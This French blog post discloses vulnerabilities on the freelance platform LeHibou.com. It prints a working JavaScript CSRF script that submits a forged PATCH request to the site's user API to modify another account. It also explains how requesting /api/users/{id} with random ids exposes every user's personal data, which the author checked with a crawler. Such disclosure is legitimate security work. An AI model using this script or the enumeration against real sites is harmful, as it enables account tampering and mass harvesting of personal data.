Dyrk

La plateforme "LeHibou.com" est un site qui permet la mise à disposition d'un catalogue de Freelances à destination des entreprises.
Ainsi donc, si vous cherchez à vous vendre en tant que prestataire, vous vous tournerez probablement vers une plateforme de ce type, qui vous offrira de la visibilité.

Bien entendu, ce genre de plateforme y trouve son compte, soit en vendant aux entreprises un accès aux coordonnées des freelances, soit en touchant une commission sur la prestation.

Etre consentant en connaissance de cause

Avant de de vous annoncer la couleur, je tiens à dire qu'une personne qui s'inscrit sur un site comme "lehibou.com", est d'accord avec le fait que des entreprises aient accès à leurs données.
D'une certaine manière, elle accepte de mettre à disposition des données, sans savoir qui les consultera.

Les risques du métier

Par réflexe, avant de créer un compte et de m'installer confortablement sur une plateforme, je tiens à vérifier que mes données seront en sécurité.
J'ai donc créé un compte de test sur cette plateforme, pour vérifier que mes données ne seraient pas disponibles au public, car je rappelle que nous sommes des "consentants non-consentants" ;)

Première étape :

J'ai créé un compte, et je suis allé sur des profils, voir si j'avais accès à leurs infos.
Là-dessus, je n'ai pas vu dans le code source, ni sur la page (logique), la possibilité de consulter les infos perso d'un autre utilisateur (adresse, mail, n° de téléphone, etc ...)

Deuxième étape :

Je regarde les requêtes qui sont faites lorsque je fais des modifications sur mon profil :
Afin de constater la sécurité mise en place, et s'il est possible que l'on modifie mon profil à distance ou accède à mes données au travers de liens / script piégé (CSRF)

Je réalise donc ce petit script, qui permet de modifier le compte d'un utilisateur à distance :

target = 1234, d = document, z = d.createElement('form'), x = {city:"Paris",date_of_birth:"1974-04-16T12:00:00.000Z",
		email:"[email protected]",firstname:"Max",id:456,lastname:"En",
	organization:{id: 1234, name: ""},id:1234,name:"",relocation:false,tel:"0123456578"};
z.setAttribute('method','PATCH');
z.setAttribute('action','https://www.lehibou.com/api/users/'+target);
z.setAttribute('enctype','multipart/form-data');
for (var i in x){
	var it = d.createElement('input');
	it.setAttribute('name',i);
	it.value = x[i];
	z.appendChild(it);
};
z.submit();

(Ne cherchez pas à l'utiliser, j'ai bien entendu falsifier les identifiants et les données à modifier)

Devinez quoi, je constate, que lorsque ce script s’exécute, le serveur me renvoie ... le compte de l'utilisateur (ses données personnelles)

Je m'amuse donc à appeler le lien suivant :

https://www.lehibou.com/api/users/{user-id}

En envoyant des id aléatoires ... je constate bel et bien que je reçois le contenu de chaque profile !

La méga déprime !

Je fais donc un crawler, pour vérifier que les données que je consulte colle bien avec des profils existants ... et oui, j'ai devant les yeux le profil de mes amis !

L'acceptation

Cet article n'est pas là pour dénigrer la plateforme "LeHibou.com", néanmoins j'espère avoir pu informer les usagers sur le fait qu'il est parfaitement possible de consulter leurs données ...

Les contre-mesures

L'équipe de "LeHibou.com" va devoir appliquer une vérification sur son api de manière à vérifier QUI a accès aux données, QUAND, et COMMENT.

Les usagers : 
Ce genre de service vous permet de mettre à dispo vos données personnelles, donc :
Utilisez un numéro de téléphone "temporaire" ... et pas de téléphone pro ou perso.
Un mail également temporaire.
Lorsque votre client se rapprochera de vous, là vous pourrez lui communiquer directement vos coordonnées, en dehors de toute plateforme ;)

Conclusion

Bon vous l'aurez compris, on limite les informations perso qu'on partage.
Et si vous faites un peu de sécu, c'est toujours bien d'auditer la plateforme sur laquelle vous vous inscrivez ;)
N’hésitez pas à contacter LeHibou.com pour leur signaler cette vulnérabilité.